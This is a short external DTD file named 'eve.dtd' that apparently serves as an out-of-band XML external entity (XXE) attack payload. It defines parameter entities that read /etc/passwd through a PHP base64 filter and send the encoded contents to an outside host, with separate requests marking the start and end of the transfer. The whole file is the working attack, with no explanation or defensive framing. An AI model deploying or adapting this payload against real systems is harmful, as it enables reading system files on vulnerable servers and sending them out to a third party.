eve.dtd

<?xml version="1.0" encoding="UTF-8"?>
<!ELEMENT check (sid,name,timestamp)>
<!ELEMENT sid (#PCDATA)>
<!ELEMENT name (#PCDATA)>
<!ELEMENT timestamp (#PCDATA)>
<!ENTITY % zfile SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/passwd">
<!ENTITY % confirm1 SYSTEM "https://dianbao.vercel.app/send/3AD2781AD6E69/ESON_head">
		%confirm1;
<!ENTITY % al "<!ENTITY hello SYSTEM 'https://dianbao.vercel.app/send/3AD2781AD6E69/ESON%zfile;'>">
		%al;
<!ENTITY % confirm2 SYSTEM "https://dianbao.vercel.app/send/3AD2781AD6E69/ESON_tail">
		%confirm2;
